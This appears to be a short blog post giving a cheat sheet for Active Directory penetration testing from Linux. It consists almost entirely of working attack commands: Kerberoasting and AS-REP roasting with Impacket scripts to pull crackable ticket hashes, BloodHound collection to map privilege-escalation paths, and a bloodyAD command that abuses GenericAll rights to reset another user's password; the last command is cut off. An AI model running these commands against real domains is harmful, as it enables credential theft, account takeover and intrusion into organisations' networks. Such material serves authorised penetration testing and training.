Showing posts from February, 2025

Active Directory Penetration Testing using Linux

  Kerberoasting

    # Get TGS ticket using GetUserSPNs.py
    sudo GetUserSPNs.py -request -dc-ip 10.10.10.10 Steins.local/mark

  Find Pre-Auth Disabled Users

    GetNPUsers.py DOMAIN/ -usersfile user.txt -outputfile hash.txt -dc-ip 10.10.10.10

  Running Bloodhound on Linux

    # Match the time with the domain controller.
    sudo apt-get install ntpdate
    sudo ntpdate <DC IP>
    # Add the required DNS entries to /etc/hosts if there is no direct DNS
    # Once you have creds for any user, run BloodHound to look for priv esc
    git clone https://github.com/dirkjanm/BloodHound.py
    pip install bloodhound
    bloodhound-python -u UserName -p "P@SSW)RD!" -d steins.local -ns 10.10.10.10 -c All

  Abusing GenericAll or ForceChangePassword or Password Reset

    git clone https://github.com/CravateRouge/bloodyAD
    # User1 has GenericAll permissions on User2
    # Change password for User2
    python bloodyAD.py -u "User1" -p "Password1" -d "domain.local" --host "10.10.10.4" set password "User2" "123456...